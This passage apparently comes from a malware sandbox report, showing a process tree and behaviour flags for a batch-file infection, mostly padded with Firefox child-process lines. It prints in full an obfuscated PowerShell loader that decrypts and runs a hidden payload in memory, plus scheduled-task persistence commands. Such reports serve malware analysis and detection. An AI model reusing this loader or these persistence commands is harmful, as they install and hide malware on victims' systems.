PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe
PID 2768 wrote to memory of 3236	2768	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K6HWNFwR9H3Es7uKiOYPEyVIGXmH2U9ChCv503SEHLE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UX/NCcpXrPhcsDbevWzf8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pUCEQ=New-Object System.IO.MemoryStream(,$param_var); $Zbgyr=New-Object System.IO.MemoryStream; $LdsEp=New-Object System.IO.Compression.GZipStream($pUCEQ, [IO.Compression.CompressionMode]::Decompress); $LdsEp.CopyTo($Zbgyr); $LdsEp.Dispose(); $pUCEQ.Dispose(); $Zbgyr.Dispose(); $Zbgyr.ToArray();}function execute_function($param_var,$param2_var){ $vRkBf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $gvbHz=$vRkBf.EntryPoint; $gvbHz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$isAHi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($YGxtv in $isAHi) { if ($YGxtv.StartsWith(':: ')) { $lkrNN=$YGxtv.Substring(3); break; }}$payloads_var=[string[]]$lkrNN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_985_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_985.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_985.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_985.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\system32\net.exe
net file
5⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
6⤵
PID:1212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K6HWNFwR9H3Es7uKiOYPEyVIGXmH2U9ChCv503SEHLE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UX/NCcpXrPhcsDbevWzf8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pUCEQ=New-Object System.IO.MemoryStream(,$param_var); $Zbgyr=New-Object System.IO.MemoryStream; $LdsEp=New-Object System.IO.Compression.GZipStream($pUCEQ, [IO.Compression.CompressionMode]::Decompress); $LdsEp.CopyTo($Zbgyr); $LdsEp.Dispose(); $pUCEQ.Dispose(); $Zbgyr.Dispose(); $Zbgyr.ToArray();}function execute_function($param_var,$param2_var){ $vRkBf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $gvbHz=$vRkBf.EntryPoint; $gvbHz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_985.bat';$isAHi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_985.bat').Split([Environment]::NewLine);foreach ($YGxtv in $isAHi) { if ($YGxtv.StartsWith(':: ')) { $lkrNN=$YGxtv.Substring(3); break; }}$payloads_var=[string[]]$lkrNN.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3040

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsBIOS" /tr "C:\ProgramData\WindowsBIOS"
6⤵
- Creates scheduled task(s)
PID:4468

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2700

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2768

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.0.100660810\1742361342" -parentBuildID 20230214051806 -prefsHandle 1776 -prefMapHandle 1772 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {44eea1c2-fda4-4971-82b5-38e50e2e6df8} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 1852 2663002cb58 gpu
3⤵
PID:3236

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.1.2091866116\1128659706" -parentBuildID 20230214051806 -prefsHandle 2408 -prefMapHandle 2404 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2685dbf-2fdf-41ab-8ef8-36e2c0ff608f} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 2420 26623189c58 socket
3⤵
PID:4220

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.2.256074388\248476752" -childID 1 -isForBrowser -prefsHandle 2964 -prefMapHandle 2960 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f889e8be-37d9-41d7-bf57-3c7c558a1c9e} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 2976 26632d1a258 tab
3⤵
PID:3872

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.3.1529030382\1460636924" -childID 2 -isForBrowser -prefsHandle 3680 -prefMapHandle 3676 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d769bdb-ec24-4ae3-8915-e48943dd1457} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 3692 26634f68b58 tab
3⤵
PID:3244

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.4.1028886267\1892362035" -childID 3 -isForBrowser -prefsHandle 5180 -prefMapHandle 5176 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97c1d945-0cec-40e6-bb5c-d6559e1bf8ca} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 5192 26636b72e58 tab
3⤵
PID:2700

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.5.152362659\126407834" -childID 4 -isForBrowser -prefsHandle 5336 -prefMapHandle 5340 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2de62f84-7f51-4525-8463-5d4346c54ce1} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 5324 2663735eb58 tab
3⤵
PID:2860

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.6.741620455\516232653" -childID 5 -isForBrowser -prefsHandle 5612 -prefMapHandle 5608 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfff7aad-b8db-4f7f-ae14-e42f101812d0} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 5620 26637361e58 tab
3⤵
PID:4144

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.7.1552837331\1292558497" -childID 6 -isForBrowser -prefsHandle 5912 -prefMapHandle 5960 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2229c003-9b94-42d7-ad5e-1289e0296542} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 5972 26638f9b658 tab
3⤵
PID:5536

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.8.1111931378\1197077387" -childID 7 -isForBrowser -prefsHandle 5536 -prefMapHandle 8532 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c194ca98-72bf-42a4-8e86-d25332fe70bc} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 3828 26638b30958 tab
3⤵
PID:5884

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.9.1883264614\344905650" -childID 8 -isForBrowser -prefsHandle 3832 -prefMapHandle 5540 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd3053a2-3d62-450a-9929-4ec779d68045} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 5732 2662f20bb58 tab
3⤵
PID:5888

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.10.66662607\1598909540" -childID 9 -isForBrowser -prefsHandle 8704 -prefMapHandle 5724 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52384fa4-200f-4689-8af9-5c501acd32a7} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 8484 2662f336e58 tab
3⤵
PID:5896

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.11.1342471645\2022901779" -childID 10 -isForBrowser -prefsHandle 8300 -prefMapHandle 8092 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47a83b69-cf34-4b49-8b1d-ac3e88469657} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 8704 26638ca3858 tab
3⤵
PID:5368

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.12.907189267\1244702880" -parentBuildID 20230214051806 -prefsHandle 7548 -prefMapHandle 7556 -prefsLen 27776 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e17a5f4d-df07-4eba-9744-9d5f29dd890e} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 7552 2663918b858 rdd
3⤵
PID:5732

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.13.1391314494\464896344" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 7536 -prefMapHandle 7540 -prefsLen 27776 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7e3be8c-0180-4c30-9eb0-41f69560b295} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 7528 2663918c158 utility
3⤵
PID:5756

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.14.681916898\1427492034" -childID 11 -isForBrowser -prefsHandle 7252 -prefMapHandle 7196 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0424f77c-8251-488c-9e8d-aec5dbfe5ae3} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 7164 2663e2a7e58 tab
3⤵
PID:4272

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.15.161501966\1640574668" -childID 12 -isForBrowser -prefsHandle 9632 -prefMapHandle 7192 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {61f56daa-e073-4fe8-8682-9b69cdbb301e} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 7300 2663e2a6f58 tab
3⤵
PID:552

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.16.196378100\1177817360" -childID 13 -isForBrowser -prefsHandle 6840 -prefMapHandle 6836 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f93f804f-018e-441d-af6a-3aa27953cebb} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 6848 2663983de58 tab
3⤵
PID:6048

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.17.1924005593\1214733185" -childID 14 -isForBrowser -prefsHandle 6692 -prefMapHandle 6688 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aaf777e1-4e43-4b88-bf5e-e12b5a429cc5} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 6588 2663e789e58 tab
3⤵
PID:6056

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.18.1220945394\1580578996" -childID 15 -isForBrowser -prefsHandle 6600 -prefMapHandle 6656 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7b6413f-471e-4af0-a943-b3d806cbf520} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 6612 2663e3f8258 tab
3⤵
PID:5276

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.19.620743694\1544111814" -childID 16 -isForBrowser -prefsHandle 6412 -prefMapHandle 6404 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51d8d950-ca8e-4fe6-8f75-a428e1fe5635} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 6424 266361cef58 tab
3⤵
PID:6796

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.20.1911339712\1997311777" -childID 17 -isForBrowser -prefsHandle 10340 -prefMapHandle 10336 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b9ca90d-3311-4d72-84b6-bce9a9c2e0e8} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 10344 266392a2258 tab
3⤵
PID:6960

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.21.611089694\1720916776" -childID 18 -isForBrowser -prefsHandle 1528 -prefMapHandle 1536 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {15463722-5f9f-4a60-a1ad-f0d78f181a55} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 10576 26639c15458 tab
3⤵
PID:7000

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.22.1136323191\934276882" -childID 19 -isForBrowser -prefsHandle 11068 -prefMapHandle 7128 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64e21fd8-b179-4a43-a6d4-42a32d5980a5} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 10952 2663fc57358 tab
3⤵
PID:7088

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.23.1498161238\1124810779" -childID 20 -isForBrowser -prefsHandle 11208 -prefMapHandle 11216 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d651756-6ede-43ed-ac15-c94d7062b838} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 8552 266400a1a58 tab
3⤵
PID:7100

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.24.771285215\179450692" -childID 21 -isForBrowser -prefsHandle 11344 -prefMapHandle 11348 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fad2971-d747-4d41-b5f1-f82de544803c} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 11336 266400a0558 tab
3⤵
PID:7068

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.25.1263861041\1380641584" -childID 22 -isForBrowser -prefsHandle 11600 -prefMapHandle 11544 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {876237e0-af0d-4a4f-bb5d-558e70f25515} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 11408 2663ffc9658 tab
3⤵
PID:1156

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.26.341280742\1631965721" -childID 23 -isForBrowser -prefsHandle 11924 -prefMapHandle 11920 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cab04df0-4b8d-4bb9-a3d8-7bd22647919a} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 11908 266405ee958 tab
3⤵
PID:7764

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.27.1909796443\1737799912" -childID 24 -isForBrowser -prefsHandle 8716 -prefMapHandle 5052 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {341043d0-2bce-4786-ac2c-7090c3511d53} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 5740 266307d7e58 tab
3⤵
PID:6140

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.28.928903051\1870534795" -childID 25 -isForBrowser -prefsHandle 7656 -prefMapHandle 7684 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aac051e7-4e9f-4ad7-a666-4f23d661b1f8} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 11504 26636953858 tab
3⤵
PID:764

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.29.563953390\1095826450" -childID 26 -isForBrowser -prefsHandle 11272 -prefMapHandle 11288 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a22e7d59-1505-4086-a4c4-c56f957507ef} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 10560 266398b8458 tab
3⤵
PID:2820

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.30.739744686\410685700" -childID 27 -isForBrowser -prefsHandle 11056 -prefMapHandle 11924 -prefsLen 28041 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da2f2ccf-01c2-4acf-9cc9-1817e3964dbf} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 9352 2663ec7e558 tab
3⤵
PID:7864

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.31.691681003\1480822173" -childID 28 -isForBrowser -prefsHandle 10808 -prefMapHandle 10544 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {933fad51-10c6-4eb3-a213-1c8768e00d56} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 7148 26634f6a958 tab
3⤵
PID:7268

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.32.962650888\1397188220" -childID 29 -isForBrowser -prefsHandle 6040 -prefMapHandle 6056 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa578299-9559-48bd-afcc-0c434e51f5ae} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 6032 2663e245e58 tab
3⤵
PID:6140

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.33.14930242\683500507" -childID 30 -isForBrowser -prefsHandle 11192 -prefMapHandle 11180 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17cc0b09-5275-478e-980e-76447527b5e6} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 11280 2663e2a7558 tab
3⤵
PID:7636

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.34.266715535\219332233" -childID 31 -isForBrowser -prefsHandle 6732 -prefMapHandle 6744 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33284a87-34ae-4d57-9eed-e9aec266db33} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 6696 2663e2b8558 tab
3⤵
PID:60

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2768.35.936926967\1849090353" -childID 32 -isForBrowser -prefsHandle 10460 -prefMapHandle 10444 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1264 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19015043-89de-4da7-b28c-f7271d1f28f1} 2768 "\\.\pipe\gecko-crash-server-pipe.2768" 10376 2663e2f4458 tab
3⤵
PID:4812

C:\Program Files\Mozilla Firefox\firefox.exe
